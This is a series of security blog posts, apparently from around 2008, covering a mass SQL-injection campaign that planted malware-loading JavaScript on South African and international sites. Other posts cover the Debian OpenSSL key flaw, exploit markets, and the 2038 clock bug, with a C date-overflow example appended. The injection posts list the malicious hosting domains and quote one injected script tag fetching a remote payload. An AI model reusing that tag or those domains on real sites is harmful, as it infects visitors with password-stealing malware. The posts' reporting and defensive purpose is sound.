Microsoft has released a security advisory detailing three ways to respond to the SQL injection attacks. This advisory doesn't cover a patch, just three tools:
- HP Scrawlr is a lightweight version of HP's WebInspect that will look for SQL injection flaws. I love that they used the Bobby Tables XKCD comic.
- A new version of UrlScan (3.0 beta), the IIS version of mod_security.
- A source code analyser which will identify SQL injection vulns, although it currently only works for ASP and not ASP.NET.
Over the last few weeks, we have seen a set of incredibly uncomplicated and simple attacks effectively compromise several hundred South African web pages, and several million internationally. Many of the South African sites compromised were important; including major media organisations, several government institutions, large mining houses and even one information security company, who still have not removed the pie from their face. The intention of the attacks was to use the compromised web pages to infect visitors with a variety of malware, but most commonly, a trojan which attempts to steal as many passwords as it can, including specific references to some internet banking sites.
The response to the incident from both consumers and the affected companies seems to indicate that when it comes to the web in South Africa, nobody cares.
Continue reading "Major SA websites hacked by China - nobody cares about the Web"
Continue reading "SQL injection domains and SA stats"
There's also a new consequence. Instead of just silently infecting your users with malware, which is hard to spot, Google is now blocking access to some of the sites, as does Firefox if you have the safe browsing lists enabled. If reputation doesn't drive action, falling ad revenues should.
Continue reading "SQL injections continue"
Last week, Roberto Preatoni, founder of WabiSabiLabi, the exploit eBay, gave a talk at the ITWeb Security Conference about his creation. I really wanted to ask a question, but there was no time. At the end of his talk, when asked who agrees with Roberto that WabiSabiLabi is a good idea (i.e. creating a marketplace for vulnerabilities and exploits to be freely sold and traded, like eBay), I was surprised to see so many hands go up, as the general info sec community has reacted quite harshly to the idea. A possible explanation based on my experience is that many ITWeb attendees are not 'hardcore' security people, and haven't been following the disclosure argument over the last decade. Then, given only Roberto's talk, they chose to agree with him due to a lack of any exposure to a rebuttal. When asked who disagrees, I was the only one who put their hand up.
So, here's why.
Continue reading "Why I think Exploit Markets are bad - a response to Roberto Preatoni of WabiSabiLabi"
Debian released a patch to OpenSSL for a Debian-specific bug which resulted in the random numbers used for the secret parts of key generation not being so random (due to the random number generator not being seeded). Quoting from the mailing list announcement:
Affected keys include SSH keys, OpenVPN keys, DNSSEC keys, and key material for use in X.509 certificates and session keys used in SSL/TLS connections [generated after 2006-09-17]. Keys generated with GnuPG or GNUTLS are not affected, though.
Ubuntu has also released a security announcement stating they too are affected (which likely means other Debian based distros are too, like the Xandros on your Asus EEE PC). In their words:
We consider this an extremely serious vulnerability, and urge all users to act immediately to secure their systems.
In our instance we needed to regenerate several SSH host keys. For ease of use, here are instructions for doing so. Please note these instructions are superseded by the instructions which will be posted here (but aren't yet).
Continue reading "Debian (and derivatives) OpenSSL-based keys vulnerability"
So, the SQL injections of last month are still going and on the increase. At 11am SAST Google's index had 1 070 000 infected pages. Not all of these are from the same source, or load the same malware. However, they have the same basic principle:
generic SQL injection -> Javascript -> infect visitors
Several of the sites in South Africa I've been watching have been re-infected. I spoke to several of the admins, but it seems they are just restoring from backup and not fixing the root cause. The domains currently being injected and containing the malicious Javascript are:
- nihaorr1.com
- 2117966.net
- aspder.com
- haoliuliang.net
- nmidahena.com
- free.hostpinoy.info
- xprmn4u.info
- winzipices.cn
- wowgm1.cn
- killwow1.cn
- wowyeye.cn
New ones are coming to my attention fairly quickly at the moment, though. For example, wowgm1.cn was re-injected over winzipices.cn on a few pages. The 'wow' range seems to be related, as they are re-infecting pages with a new URL. On the point of re-injections, it seems some are overwriting each other in funny ways; for example, the following was found on one page (asterisks added):
<script src=http://www.2<script src=h**p://www.2117966.net/f*ckjp.js></script>
It bothers me that the security industry (particularly in SA) doesn't seem to have cottoned on to this as a widespread, pervasive attack. Shadowserver (one, two) seems to be the only one getting close to the problem, but even SANS is treating these as separate events. There is only basic protection at the moment: if you click through from some of these sites (10%?) in Google, you will get a malware warning. Firefox's security setting (which uses the same list as Google, i.e. stopbadware.org) prevents me from continuing to the site anyway.
Given how successful the exploitation of such an 'old' vulnerability has been, it is likely we are only going to see more (and better executed) versions of this in the next few months (years?). Hitting over a million pages with a pretty lame attack that only targets Microsoft SQL is fairly impressive. If they just modified their SQL to work on MySQL or Postgres I'm sure we would see more than a million more hit. It is interesting to note that it has taken this long for someone to try and 'monetise' SQL injection, as it has been around for a while (8 years?). My guess is that it will take less time for the bad guys to do the same with XSS & CSRF, though Microsoft's default request validation will save some of us, not because devs have cottoned on.
Based on Google's index, the following sites are/were infected based on the SQL injection attack discussed all over the place (1, 2, 3, 4, 5). From an SA perspective, News24, Sunday Times (available in dead tree only) and Talk Radio 702 have covered this.
Click here for Google's latest list.
Click here for Yahoo's latest list (much less accurate).
Status: Medium
- Most of the sites hosting the JavaScript are down, and most of the sites listed as infected seem to be clean (for SA). As this appears to be the 3rd or 4th injection, if web admins haven't fixed the root vulnerability and the attack is re-run pointing at a different domain, it could happen again.
- The command and control server the Trojan sends stolen passwords to is still up.
Warnings:
- Do not click on any of the links from Google or Yahoo as you are likely to be taken to a website which will infect your computer with a trojan.
- Search engines (aka Google and Yahoo) work on an index, which works on a snapshot of information. This snapshot takes a while to update, so some sites may be infected and not listed yet, and others may no longer be infected and still listed.
OSVDB's SoC code monkey, Dave, has been ferreting away and is already producing some good stuff (one, two, three). I am going to have a go at getting back into mangling some vulns later tonight. Given that the last time I mangled vulns was almost four years ago, I have a feeling I will be very pleased/surprised by the many changes.
For those of you living in the dark ages, OSVDB will be *the* canonical vulnerability reference one day, in the meantime it's just more accurate than the rest ;), all it needs is more manglers.
Continue reading "Chip & Pin Cards are a joke"
I'm really enjoying the hype around the firewire hacks, originally presented by Maximillian Dornseif in 2004, given new life in 2006 by Adam Boileau and now re-hyped in 2008 thanks to Adam releasing the last bit of scripts to unlock a Windows machine (illegally!, gosh). I think Adam sums this up quite nicely:
Yes, it's a FEATURE, not a bug. It's the Fire in Firewire. Yes, I know this, Microsoft know this. The OHCI-1394 spec knows this. People with firewire ports generally don't.
Continue reading "The Fire in Firewire"
Microsoft have released a bunch of protocol specifications for their proprietary protocols or implementations. Some of the whoppers I've added to my reading list are (in alphabetical order):
- "FrontPage Server Extensions: Website Management Specification" http://msdn2.microsoft.com/en-us/library/cc217914.aspx
- "Firewall and Advanced Security Protocol Specification" http://msdn2.microsoft.com/en-us/library/cc231461.aspx
- "Local Security Authority (Domain Policy) Remote Protocol Specification" http://msdn2.microsoft.com/en-us/library/cc234225.aspx
- "NT LAN Manager (NTLM) Authentication Protocol Specification" http://msdn2.microsoft.com/en-us/library/cc236621.aspx
- "NTLM Over HTTP Protocol Specification" http://msdn2.microsoft.com/en-us/library/cc237488.aspx
- "Remote Desktop Protocol: Basic Connectivity and Graphics Remoting Specification" http://msdn2.microsoft.com/en-us/library/cc240445.aspx
- "Remote Procedure Call Over HTTP Protocol Specification" http://msdn2.microsoft.com/en-us/library/cc243950.aspx
- "Windows Security Health Agent (WSHA) and Windows Security Health Validator (WSHV) Protocol Specification" http://msdn2.microsoft.com/en-us/library/cc251347.aspx
- "Windows Update Services: Client-Server Protocol Specification" http://msdn2.microsoft.com/en-us/library/cc251937.aspx
The items marked in red are for immediate reading. I am particularly excited about the WSUS specification after my attempts at dissecting it in my masters thesis. This will be good for Microsoft in the long run. Yay to the EU.
Heard of the year 2038 Unix clock overflow bug? The 30th preversary is at 3am this Saturday. If any of your banks are using 32-bit Unix systems to do 30-year home loan calculations you may soon hear about this.
singe@platform:~$ uname -a
Linux platform 2.6.15-27-server #1 SMP Fri Dec 8 18:43:54 UTC 2006 i686 GNU/Linux
singe@platform:~$ sudo date -u 011903142038.06
Tue Jan 19 03:14:00 UTC 2038
singe@platform:~$ date
Tue Jan 19 05:14:07 SAST 2038
singe@platform:~$ date
Fri Dec 13 22:15:52 SAST 1901
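The wrap shown in that session, reproduced in arithmetic so you can check a date computation before it is stored in a 32-bit time_t. This is an added example, not code from the original post; the loan start dates are constructed, the day-count routine is Howard Hinnant's days_from_civil, and the 32-bit wrap is emulated rather than taken from the host's time_t.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Days from 1970-01-01 to a proleptic Gregorian date (Hinnant's
   days_from_civil), so the result does not depend on the host time zone. */
static int64_t days_from_civil(int y, int m, int d) {
    y -= m <= 2;
    int64_t era = (y >= 0 ? y : y - 399) / 400;
    int64_t yoe = y - era * 400;
    int64_t doy = (153 * (m + (m > 2 ? -3 : 9)) + 2) / 5 + d - 1;
    int64_t doe = yoe * 365 + yoe / 4 - yoe / 100 + doy;
    return era * 146097 + doe - 719468;
}

/* UTC calendar date and time to seconds since the epoch, in 64 bits. */
static int64_t epoch_utc(int y, int m, int d, int hh, int mm, int ss) {
    return days_from_civil(y, m, d) * 86400 + hh * 3600 + mm * 60 + ss;
}

/* True when the instant fits a signed 32-bit time_t (the last one that
   does is 2038-01-19 03:14:07 UTC, the session's "3am this Saturday"). */
static bool fits_time32(int64_t t) {
    return t >= INT32_MIN && t <= INT32_MAX;
}

/* What a 32-bit time_t ends up holding: the value wraps modulo 2^32, which
   is how one second past 03:14:07 lands in December 1901. (The uint32_t to
   int32_t step is modular on mainstream compilers.) */
static int32_t as_time32(int64_t t) {
    return (int32_t)(uint32_t)t;
}

/* Maturity instant of a loan: start date at midnight UTC plus a whole number
   of years, the 30-year term the post worries about (constructed example). */
static int64_t maturity_epoch(int sy, int sm, int sd, int term_years) {
    return epoch_utc(sy + term_years, sm, sd, 0, 0, 0);
}

int main(void) {
    int64_t m = maturity_epoch(2008, 1, 20, 30);   /* matures 2038-01-20 */
    printf("maturity epoch %lld fits 32-bit time_t: %s\n",
           (long long)m, fits_time32(m) ? "yes" : "NO");
    printf("a 32-bit time_t would store %ld (a day in 1901)\n", (long)as_time32(m));
    return 0;
}
```

A loan starting on 2008-01-19 still fits (it matures just before the cut-off), while one starting a day later does not; the check belongs wherever a date is narrowed to 32 bits.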